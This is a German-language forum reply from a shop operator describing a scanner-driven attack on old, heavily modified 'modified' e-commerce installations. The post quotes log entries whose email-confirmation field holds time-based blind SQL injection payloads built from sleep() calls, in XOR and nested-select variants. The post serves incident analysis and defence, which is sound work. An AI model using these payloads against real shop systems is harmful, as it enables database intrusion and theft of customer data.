Antwort #12 am: 29. Januar 2024, 08:44:56
moin und sorry für die verspätete rückmeldung. der angriff wurde mit der Acunetix-software durchgeführt. gecrackte versionen von Acunetix sind leicht zu finden. die genauen zusammenhänge sind mir nicht klar, da Acunetix sich ja offiziell als "gute" software gibt. markant sind zig einträge in customers mit sqlinjection wie:
24-01-25-14-27-33---Array
(
[action] => process
[additional] => 1
[city] => San Francisco
[company] => Testing
[confirm_email_address] => if(now()=sysdate(),sleep(15),0)
[country] => 27
[email_address] => testing@example.com
[email_address_lgn] => testing@example.com
[firstname] => zbdrariI
[gender] => m
[lastname] => zbdrariI
[lgnmodus] => login
[password] => u]H[ww6KrA9F.x-F
[password_lgn] => u]H[ww6KrA9F.x-F
[postcode] => 94102
[street_address] => 3137 Laguna Street
)
24-01-25-14-27-36---Array
(
[action] => process
[additional] => 1
[city] => San Francisco
[company] => Testing
[confirm_email_address] => testing@example.com0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
[country] => 33
[email_address] => testing@example.com
[email_address_lgn] => testing@example.com
[firstname] => zbdrariI
[gender] => m
[lastname] => zbdrariI
[lgnmodus] => login
[password] => u]H[ww6KrA9F.x-F
[password_lgn] => u]H[ww6KrA9F.x-F
[postcode] => 94102
[street_address] => 3137 Laguna Street
)
24-01-25-14-27-37---Array
(
[action] => process
[additional] => 1
[city] => San Francisco
[company] => Testing
[confirm_email_address] => testing@example.com0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
[country] => 21
[email_address] => testing@example.com
[email_address_lgn] => testing@example.com
[firstname] => zbdrariI
[gender] => m
[lastname] => zbdrariI
[lgnmodus] => login
[password] => u]H[ww6KrA9F.x-F
[password_lgn] => u]H[ww6KrA9F.x-F
[postcode] => 94102
[street_address] => 3137 Laguna Street
)
24-01-25-14-27-38---Array
(
[action] => process
[additional] => 1
[city] => San Francisco
[company] => Testing
[confirm_email_address] => testing@example.com0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
[country] => 21
[email_address] => testing@example.com
[email_address_lgn] => testing@example.com
[firstname] => zbdrariI
[gender] => f
[lastname] => zbdrariI
[lgnmodus] => login
[password] => u]H[ww6KrA9F.x-F
[password_lgn] => u]H[ww6KrA9F.x-F
[postcode] => 94102
[street_address] => 3137 Laguna Street
)
24-01-25-14-27-39---Array
(
[action] => process
[additional] => 1
[city] => San Francisco
[company] => Testing
[confirm_email_address] => testing@example.com0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
[country] => 27
[email_address] => testing@example.com
[email_address_lgn] => testing@example.com
[firstname] => zbdrariI
[gender] => m
[lastname] => zbdrariI
[lgnmodus] => login
[password] => u]H[ww6KrA9F.x-F
[password_lgn] => u]H[ww6KrA9F.x-F
[postcode] => 94102
[street_address] => 3137 Laguna Street
)
24-01-25-14-27-43---Array
(
[action] => process
[additional] => 1
[city] => San Francisco
[company] => Testing
[confirm_email_address] => testing@example.com0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
[country] => 33
[email_address] => testing@example.com
[email_address_lgn] => testing@example.com
[firstname] => zbdrariI
[gender] => m
[lastname] => zbdrariI
[lgnmodus] => login
[password] => u]H[ww6KrA9F.x-F
[password_lgn] => u]H[ww6KrA9F.x-F
[postcode] => 94102
[street_address] => 3137 Laguna Street
)
24-01-25-14-27-44---Array
(
[action] => process
[additional] => 1
[city] => San Francisco
[company] => Testing
[confirm_email_address] => testing@example.com0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
[country] => 21
[email_address] => testing@example.com
[email_address_lgn] => testing@example.com
[firstname] => zbdrariI
[gender] => m
[lastname] => zbdrariI
[lgnmodus] => login
[password] => u]H[ww6KrA9F.x-F
[password_lgn] => u]H[ww6KrA9F.x-F
[postcode] => 94102
[street_address] => 3137 Laguna Street
)
24-01-25-14-27-45---Array
(
[action] => process
[additional] => 1
[city] => San Francisco
[company] => Testing
[confirm_email_address] => testing@example.com0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
[country] => 21
[email_address] => testing@example.com
[email_address_lgn] => testing@example.com
[firstname] => zbdrariI
[gender] => f
[lastname] => zbdrariI
[lgnmodus] => login
[password] => u]H[ww6KrA9F.x-F
[password_lgn] => u]H[ww6KrA9F.x-F
[postcode] => 94102
[street_address] => 3137 Laguna Street
)
24-01-25-14-27-46---Array
(
[action] => process
[additional] => 1
[city] => San Francisco
[company] => Testing
[confirm_email_address] => testing@example.com0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
[country] => 27
[email_address] => testing@example.com
[email_address_lgn] => testing@example.com
[firstname] => zbdrariI
[gender] => m
[lastname] => zbdrariI
[lgnmodus] => login
[password] => u]H[ww6KrA9F.x-F
[password_lgn] => u]H[ww6KrA9F.x-F
[postcode] => 94102
[street_address] => 3137 Laguna Street
)
24-01-25-14-27-49---Array
(
[action] => process
[additional] => 1
[city] => San Francisco
[company] => Testing
[confirm_email_address] => (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
[country] => 33
[email_address] => testing@example.com
[email_address_lgn] => testing@example.com
[firstname] => zbdrariI
[gender] => m
[lastname] => zbdrariI
[lgnmodus] => login
[password] => u]H[ww6KrA9F.x-F
[password_lgn] => u]H[ww6KrA9F.x-F
[postcode] => 94102
[street_address] => 3137 Laguna Street
)
aber es sind teilweise auch andere tables betroffen. u.. auch tables on 3th-party modulen, was dier sache nicht einfacher macht.
jetzt tder wichtige teil: die betroffenen shopsysteme sind extrem stark modifizierte modified-systeme, welche in dem sinne nicht updatebar sind. ich pflege security-relevante updates nach, kann da natürlich auch sachen übersehen.
das heisst also in keinem Fall, das die aktuelle modified-versionen von dieser lücke betroffen sind.ich habe sämtliche sicherheitsupdates drin, das sind ca. 50 stück un so kann der angriff auf die customers nicht zum ziel geführt haben, aber irgendeine schwachstelle gibt es noch, ich checke das gerade.
ihr könnt auch mal googeln nach 555-666-0606, da findetman einige einträge, das alle möglichen shops gescannt werden, aber da erfährt man nichts sinnvolles.
Also nochmal: Es gibt keinen Hinweis, das eine aktuelle Version von modified betroffen sein könnte!https://eedle.com/2014/01/17/hackers-with-a-sense-of-humour-or-at-least-a-love-of-chinese-food/https://forum.shopware.com/t/spam-uber-kontaktformular/69961/5die gutartigkeit der penetrationstest darf bezweifelt werden, ich hatte letztes jahr einen shop mit über 500 laguna-bestellungen, mittlerweile blocke ich die versuche ab undd logge die mit.
edit: bei den betroffenen system, handelt es sich um ein ca. 10 jahre altes modified, welches seit sommer 2023 unter PHP8.2 und smarty 3.9 läuft. server ist so ein kubernetes-konstrukt, also ftp-schwachstellen sind ausgeschlossen, da es kein sFTP o.ä. gibt. das deployment läuft via gitlab und argocd.